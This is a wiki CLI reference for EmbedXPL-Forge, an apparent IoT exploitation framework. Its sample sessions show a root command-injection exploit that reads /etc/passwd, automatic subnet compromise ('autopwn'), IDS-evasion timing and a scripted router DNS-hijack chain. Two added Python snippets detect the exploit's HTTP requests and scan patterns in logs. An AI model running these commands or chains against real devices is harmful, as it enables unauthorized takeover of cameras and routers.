CLI Reference

André Henrique edited this page Jun 8, 2026 · 1 revision

Complete reference for all EmbedXPL-Forge interactive shell commands and global options.


Interactive Shell Commands

show modules

List available modules, optionally filtered by type, vendor, or CVE.

Syntax:

show modules [type=<category>] [vendor=<vendor>] [cve=<cve_id>]

Parameters:

| Parameter | Values | Description |
|-----------|--------|-------------|
| type | exploits, scanners, creds, payloads, encoders, generic, osint | Filter by module category |
| vendor | dlink, hikvision, zte, etc. | Filter by vendor name |
| cve | CVE-2021-36260, 2026, etc. | Filter by CVE ID or year |

Examples:

exf > show modules
Exploit Modules:
  exploits/cameras/hikvision              (22 modules)
  exploits/cameras/dahua                  (19 modules)
  exploits/routers/dlink                  (31 modules)
  exploits/routers/zte                    (12 modules)
  exploits/printers/hp                    (24 modules)
  exploits/firewalls/paloalto             (8 modules)
  ...
Total: 3000+ modules across 114+ vendors

exf > show modules type=scanners
Scanner Modules:
  scanners/autopwn
  scanners/specialized/br_isp_scanner
  scanners/cameras/rtsp_network_scan
  scanners/printers/ipp_discovery
  scanners/ics/modbus_scanner

exf > show modules vendor=hikvision
Hikvision Modules (22):
  exploits/cameras/hikvision/rtsp_rce_cve_2021_36260
  exploits/cameras/hikvision/info_disclosure_cve_2017_7921
  exploits/cameras/hikvision/snap_bypass_cve_2021_36260
  ...

exf > show modules cve=2026
2026 CVE Modules (31):
  exploits/cameras/dlink/dcs_932l_light_sensor_rce_cve_2026_36983
  exploits/routers/zte/zxhn_h298a_cred_dump_cve_2026_34474
  exploits/printers/linux/cups_pwn2own_chain_cve_2026_34480
  ...

use <module_path>

Select a module for configuration and execution.

Syntax:

use <module_path>

Examples:

exf > use exploits/cameras/hikvision/rtsp_rce_cve_2021_36260
exf (Hikvision RCE) >

exf > use creds/routers/multi_http_login
exf (Multi HTTP Login) >

exf > use scanners/autopwn
exf (AutoPwn) >

show options

Display all configurable options for the currently loaded module.

Syntax:

show options

Example output:

exf (Hikvision RCE) > show options

Module: Hikvision CVE-2021-36260 RCE
  Name:      Hikvision IP Camera Unauthenticated RCE
  CVE:       CVE-2021-36260
  CVSS:      9.8 (Critical)
  Author:    EmbedXPL-Forge
  Platform:  Hikvision IP cameras, NVR (firmware < 2.2.15)

Options:
  Name      Current Setting  Required  Description
  ----      ---------------  --------  -----------
  RHOST                      yes       Target IP address or hostname
  RPORT     80               yes       HTTP port (80 or 443 for HTTPS)
  CMD       id               yes       OS command to execute
  TIMEOUT   10               no        Connection timeout in seconds
  HTTPS     false            no        Use HTTPS instead of HTTP
  PROXY                      no        HTTP proxy (e.g., 127.0.0.1:8080)

set <OPTION> <value>

Configure a module option.

Syntax:

set <OPTION> <value>

Examples:

exf (Hikvision RCE) > set RHOST 192.168.1.100
RHOST => 192.168.1.100

exf (Hikvision RCE) > set CMD "id; uname -a; cat /etc/passwd"
CMD => id; uname -a; cat /etc/passwd

exf (Hikvision RCE) > set TIMEOUT 15
TIMEOUT => 15

exf (Hikvision RCE) > set HTTPS true
HTTPS => true

check

Verify whether the target appears to be vulnerable before executing the full exploit. The check is non-destructive: it only probes the target.

Syntax:

check

Example:

exf (Hikvision RCE) > check
[*] Checking 192.168.1.100:80 for CVE-2021-36260...
[*] Sending probe request to /SDK/webLanguage
[+] HTTP 500 returned - endpoint exists and processes PUT requests
[+] Target appears vulnerable (Hikvision, CVE-2021-36260, CVSS 9.8)

exf (DSL2750B RCE) > check
[*] Checking 192.168.1.1:80...
[-] Target returned 403 - may be patched or different firmware version
[-] Target does not appear vulnerable

run

Execute the currently loaded module against the configured target.

Syntax:

run

Example:

exf (Hikvision RCE) > run
[*] Running CVE-2021-36260 against 192.168.1.100:80
[*] Sending exploit payload to /SDK/webLanguage
[+] Command executed successfully
[+] Output:
    uid=0(root) gid=0(root) groups=0(root)
    Linux HiCamera 3.10.0 #1 SMP armv7l
[+] RCE confirmed - target is compromised
[*] Session data saved to ~/.exf_sessions/192.168.1.100
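
For defenders, both `check` and `run` above show up as PUT requests to /SDK/webLanguage, which is straightforward to look for in HTTP logs. The following is an added example, not part of EmbedXPL-Forge: it assumes a reverse proxy or firewall in front of the cameras writes combined-format access logs, and the sample lines, function names and labels are constructed for illustration.

```python
import re
from collections import defaultdict

# Constructed access-log lines (combined log format), not a real capture.
SAMPLE_LOG = """\
10.9.8.7 - - [01/Jun/2026:14:34:58 +0000] "GET /doc/page/login.asp HTTP/1.1" 200 1532 "-" "Mozilla/5.0"
10.9.8.7 - - [01/Jun/2026:14:35:01 +0000] "PUT /SDK/webLanguage HTTP/1.1" 500 0 "-" "client-a"
10.9.8.7 - - [01/Jun/2026:14:35:22 +0000] "PUT /SDK/webLanguage HTTP/1.1" 200 0 "-" "client-a"
192.168.1.20 - - [01/Jun/2026:14:40:00 +0000] "GET /ISAPI/System/deviceInfo HTTP/1.1" 401 178 "-" "nvr"
10.9.8.9 - - [01/Jun/2026:15:02:10 +0000] "PUT /sdk/weblanguage/?x=1 HTTP/1.1" 403 0 "-" "client-b"
truncated line that does not parse
"""

LINE_RE = re.compile(
    r'^(?P<src>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) '
)
WATCHED_PATH = "/sdk/weblanguage"  # endpoint named on this page, lower-cased

def find_weblanguage_puts(log_text):
    """Return {source_ip: [(timestamp, status), ...]} for PUTs to the endpoint."""
    hits = defaultdict(list)
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue  # skip malformed lines rather than abort the whole run
        # Compare on the path only, ignoring query string, case and trailing slash.
        path = m["target"].split("?", 1)[0].rstrip("/").lower()
        if m["method"] == "PUT" and path == WATCHED_PATH:
            hits[m["src"]].append((m["ts"], int(m["status"])))
    return dict(hits)

def triage(hits):
    """Label each source by the status codes the device returned to it."""
    labels = {}
    for src, events in hits.items():
        statuses = {status for _, status in events}
        if 500 in statuses:  # the response the check output above reads as vulnerable
            labels[src] = "verify-firmware-now"
        elif statuses <= {401, 403}:
            labels[src] = "rejected"
        else:
            labels[src] = "review"
    return labels

if __name__ == "__main__":
    print(triage(find_weblanguage_puts(SAMPLE_LOG)))
```

Any hit is worth a look, since the module metadata on this page lists the request as unauthenticated; the labels only order the follow-up.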

back

Unload the current module and return to the main shell prompt.

Syntax:

back

Example:

exf (Hikvision RCE) > back
exf >

search <keyword>

Search all module names, descriptions, CVEs, and vendor tags.

Syntax:

search <keyword>

Examples:

exf > search hikvision
[*] Searching for: hikvision
Modules found (22):
  exploits/cameras/hikvision/rtsp_rce_cve_2021_36260
  exploits/cameras/hikvision/info_disclosure_cve_2017_7921
  exploits/cameras/hikvision/magicpack_auth_bypass_cve_2023_28808
  exploits/cameras/hikvision/json_bypass_cve_2021_36260_variant
  ...

exf > search CVE-2026
[*] Searching for: CVE-2026
Modules found (31):
  exploits/cameras/dlink/dcs_932l_light_sensor_rce_cve_2026_36983
  exploits/cameras/dlink/dcs_933l_admin_cmd_inject_cve_2026_2218
  exploits/routers/zte/zxhn_h267n_h268n_dos_cve_2026_34473
  exploits/routers/zte/zxhn_h298a_cred_dump_cve_2026_34474
  exploits/printers/linux/cups_pwn2own_chain_cve_2026_34480
  ...

exf > search rce
[*] Searching for: rce
Modules found (184):
  exploits/routers/dlink/dir_300_600_rce
  exploits/routers/dlink/dsl_2750b_rce
  exploits/cameras/hikvision/rtsp_rce_cve_2021_36260
  exploits/cameras/dahua/cctv_rce_cve_2021_33044
  ...

info

Display detailed metadata for the currently loaded module.

Syntax:

info

Example:

exf (Hikvision RCE) > info

Module Information:
  Name:        Hikvision IP Camera CVE-2021-36260 RCE
  Path:        exploits/cameras/hikvision/rtsp_rce_cve_2021_36260
  Version:     1.2.0
  CVE:         CVE-2021-36260
  CVSS:        9.8 (Critical)
  CWE:         CWE-78 (OS Command Injection)
  Vendor:      Hikvision
  Type:        Remote Code Execution
  Auth:        None required
  Platform:    Linux (ARM, MIPS)

Affected Products:
  Hikvision IP cameras and NVRs with firmware prior to build 210625
  (hundreds of models from DS-2CD series, DS-7 NVR series, and OEMs)

Description:
  An OS command injection vulnerability in the ISAPI endpoint /SDK/webLanguage
  allows unauthenticated attackers to execute arbitrary commands as root.
  The endpoint processes XML input without sanitizing the lang parameter.

References:
  https://nvd.nist.gov/vuln/detail/CVE-2021-36260
  https://www.hikvision.com/en/support/cybersecurity/security-advisory/

sessions

Manage persistent host scan history. Sessions record tested modules, findings, and timestamps per host (keyed by SHA-256 of IP+MAC).

Syntax:

sessions list
sessions show <ip>
sessions delete <ip>
sessions export <ip>
sessions purge

Examples:

exf > sessions list
Active Sessions (3 hosts):

  Host           MAC                Vendor     Last Seen            Findings
  ----           ---                ------     ---------            --------
  192.168.1.1    AA:BB:CC:DD:EE:FF  Huawei     2026-06-01 14:22     2 vulnerabilities
  192.168.1.100  11:22:33:44:55:66  Hikvision  2026-06-01 14:35     1 vulnerability
  10.0.0.50      77:88:99:AA:BB:CC  Kapsch     2026-06-01 15:00     0 (assessment only)

exf > sessions show 192.168.1.100
Session: 192.168.1.100
  MAC Address  : 11:22:33:44:55:66
  Vendor       : Hikvision
  Open Ports   : 80, 443, 554, 37777
  First Seen   : 2026-06-01 14:30:00
  Last Updated : 2026-06-01 14:35:22

Findings:
  [+] CVE-2021-36260 (RCE, CVSS 9.8) - CONFIRMED VULNERABLE
      Module: exploits/cameras/hikvision/rtsp_rce_cve_2021_36260
      Timestamp: 2026-06-01 14:35:22
      Output: uid=0(root)

Tested (no finding):
  [-] CVE-2017-7921 (Auth Bypass) - not vulnerable (patched)

exf > sessions export 192.168.1.100
[*] Session exported to: ~/.exf_sessions/192.168.1.100_20260601.json

autopwn

Automatically scan a subnet, fingerprint all hosts, select matching modules, and attempt exploitation.

Syntax:

exf > use scanners/autopwn
exf (AutoPwn) > set target <ip_or_cidr>
exf (AutoPwn) > run

Example:

exf > use scanners/autopwn
exf (AutoPwn) > set target 192.168.1.0/24
exf (AutoPwn) > set TIMING T3
exf (AutoPwn) > run

[*] AutoPwn starting on 192.168.1.0/24 (T3 - normal)
[*] Phase 1/3: Host discovery (ARP + Nmap)...
[+] 192.168.1.1   Huawei    70:4E:6B:xx:xx  ports: 80,8080,49652  - 11 modules
[+] 192.168.1.100 Hikvision 11:22:33:xx:xx  ports: 80,443,554     -  8 modules
[+] 192.168.1.101 Dahua     AA:BB:CC:xx:xx  ports: 80,37777        -  7 modules
[*] Phase 2/3: Module matching complete (26 modules selected)
[*] Phase 3/3: Executing modules...

[192.168.1.100] exploits/cameras/hikvision/rtsp_rce_cve_2021_36260
  [+] VULNERABLE - uid=0(root)

[192.168.1.101] exploits/cameras/dahua/cctv_auth_bypass_cve_2021_33044
  [+] VULNERABLE - digest bypass confirmed

AutoPwn complete: 2/3 hosts compromised | 3 vulnerabilities found

discover [subnet]

Scan the local network (or a specified subnet) for live hosts, fingerprint devices, and suggest relevant modules.

Syntax:

discover [<subnet_cidr>] [--timing T0-T5] [--fresh]

Examples:

exf > discover
[*] Auto-detecting subnet from active interfaces...
[*] Scanning 192.168.1.0/24 (T3 - normal)...
[+] 192.168.1.1   Huawei    EG8145V5  ports: 80,49652  - 15 modules available
[+] 192.168.1.5   D-Link    DIR-615   ports: 80         -  3 modules available
[+] 192.168.1.100 Hikvision DS-2CD2   ports: 80,554     -  8 modules available

exf > discover 10.0.0.0/24 --timing T1
[*] Scanning 10.0.0.0/24 (T1 - sneaky)...

exf > discover 192.168.1.0/24 --fresh
[*] Fresh scan - ignoring previous session history

Timing profiles:

| Profile | Delay | Use case |
|---------|-------|----------|
| T0 | 300s (paranoid) | IDS evasion |
| T1 | 15s (sneaky) | Quiet audits |
| T2 | 2s (polite) | Minimal impact |
| T3 | 0.5s (normal) | Default |
| T4 | 0.1s (aggressive) | Fast LAN scans |
| T5 | 0s (insane) | CTF / lab only |
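
What these delays mean for detection: a rule that counts distinct destinations per source only fires if its window is long enough for the profile in use. The following is an added example, not part of EmbedXPL-Forge; it assumes the delay applies between probes to successive hosts, and the flow records, addresses and function names are constructed for illustration.

```python
from collections import defaultdict

# Delays from the timing table above, in seconds.
PROFILE_DELAY = {"T0": 300, "T1": 15, "T2": 2, "T3": 0.5, "T4": 0.1, "T5": 0}

def sweep_events(src, count, delay):
    """Constructed flow records (time, src, dst): one new host every `delay` s."""
    return [(i * delay, src, f"192.168.1.{i + 1}") for i in range(count)]

def max_distinct_dsts(events, window):
    """Per source, the peak number of distinct destinations contacted within
    any sliding window of `window` seconds."""
    by_src = defaultdict(list)
    for ts, src, dst in sorted(events):
        by_src[src].append((ts, dst))
    peak = {}
    for src, rows in by_src.items():
        best, left, live = 0, 0, defaultdict(int)
        for ts, dst in rows:
            live[dst] += 1
            while rows[left][0] < ts - window:  # expire records older than the window
                old = rows[left][1]
                live[old] -= 1
                if live[old] == 0:
                    del live[old]
                left += 1
            best = max(best, len(live))
        peak[src] = best
    return peak

def flagged(events, window, threshold):
    """Sources that reached `threshold` distinct hosts inside one window."""
    peaks = max_distinct_dsts(events, window)
    return sorted(src for src, n in peaks.items() if n >= threshold)

def min_window(profile, threshold):
    """Shortest window (s) that holds `threshold` probes sent at this profile's delay."""
    return PROFILE_DELAY[profile] * (threshold - 1)

# Constructed traffic: two sources sweep 40 hosts each, one at T1 and one at T3.
EVENTS = (sweep_events("10.0.0.5", 40, PROFILE_DELAY["T1"])
          + sweep_events("10.0.0.6", 40, PROFILE_DELAY["T3"]))

if __name__ == "__main__":
    print(flagged(EVENTS, 60, 20))   # ['10.0.0.6']
    print(flagged(EVENTS, 600, 20))  # ['10.0.0.5', '10.0.0.6']
```

With a threshold of 20 hosts, `min_window` gives 285 seconds for T1 and 5700 seconds for T0, so a one-minute rule sees only the T3 sweep in the sample traffic.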

apt

Browse and execute APT group attack chains. Chains reproduce known nation-state attack sequences with MITRE ATT&CK mapping.

Syntax:

apt list
apt show <group_name>
apt search <keyword>
apt run <group_name> [attack_index]

Examples:

exf > apt list
Cataloged Threat Actors (8 groups):

  Group     | Origin | Primary Targets        | Modules
  -----     | ------ | ---------------        | -------
  APT28     | RU/GRU | TP-Link, MikroTik      | 4 attacks
  Volt Typhoon | CN  | Fortinet, Cisco, SOHO  | 6 attacks
  Sandworm  | RU/GRU | ICS/OT, GPON           | 3 attacks
  Quad7     | CN     | SOHO routers (BotNet)  | 3 attacks
  Turla     | RU/FSB | Satellite, VSAT        | 2 attacks
  APT40     | CN/MSS | Maritime, IoT          | 4 attacks
  Lazarus   | KP     | Financial, IoT pivot   | 2 attacks
  Hafnium   | CN     | Exchange, SOHO pivots  | 2 attacks

exf > apt show apt28
APT28 (Fancy Bear / GRU Unit 26165)
  MITRE ATT&CK: https://attack.mitre.org/groups/G0007/
  Known CVEs:   CVE-2023-1389, CVE-2018-14847

  Attack Chains:
    [0] TP-Link Archer DNS Hijack (CVE-2023-1389)
    [1] MikroTik Chimay Red (CVE-2018-14847)
    [2] MikroTik RouterOS Credential Exfil
    [3] Mass router botnet - combined chain

exf > apt run apt28 0
[*] Executing APT28 Attack Chain #0: TP-Link Archer DNS Hijack
[*] Step 1/3: Exploit CVE-2023-1389 (auth bypass via tmLanguage)...
[+] Authentication bypassed
[*] Step 2/3: Inject DNS hijack payload...
[+] DNS server overwritten: 8.8.8.8 -> 1.2.3.4
[*] Step 3/3: Persist configuration...
[+] Chain complete - router DNS hijacked

Global Options

These options can be set at the shell level and apply to all modules unless overridden.

| Option | Default | Description |
|--------|---------|-------------|
| LOGLEVEL | info | Logging verbosity: debug, info, warn, error |
| TIMEOUT | 10 | Default connection timeout (seconds) |
| THREADS | 4 | Concurrent threads for scanning/bruteforce |
| PROXY | (none) | HTTP proxy for all requests (e.g., 127.0.0.1:8080) |
| OUTPUT | (none) | Save all findings to file (JSON or TXT) |
| SIMULATE | false | Dry-run mode - probe without executing destructive actions |

Setting global options:

exf > set LOGLEVEL debug
LOGLEVEL => debug

exf > set TIMEOUT 20
TIMEOUT => 20

exf > set PROXY 127.0.0.1:8080
PROXY => 127.0.0.1:8080

exf > set OUTPUT /tmp/findings.json
OUTPUT => /tmp/findings.json

Non-Interactive Mode (CLI Flags)

Run modules directly without entering the interactive shell.

Syntax:

embedxpl -m <module_path> -s <option> <value> [-s <option> <value> ...]

Examples:

# Run a specific module
embedxpl -m exploits/cameras/hikvision/rtsp_rce_cve_2021_36260 -s RHOST 192.168.1.100

# Network discovery
embedxpl -c "discover 192.168.1.0/24"

# RTSP camera scan
embedxpl -m exploits/cameras/multi/rtsp_cameradar_attack -s target 192.168.1.0/24

# AutoPwn on a subnet
embedxpl -m scanners/autopwn -s target 192.168.1.0/24

# Output results to file
embedxpl -m exploits/cameras/hikvision/rtsp_rce_cve_2021_36260 -s RHOST 192.168.1.100 -o results.json

Available flags:

| Flag | Description |
|------|-------------|
| -m <module> | Module path to run |
| -s <option> <value> | Set a module option (repeatable) |
| -c "<command>" | Execute a shell command |
| -o <file> | Output results to JSON file |
| --version | Print version and exit |
| --list-modules | Print all module paths and exit |
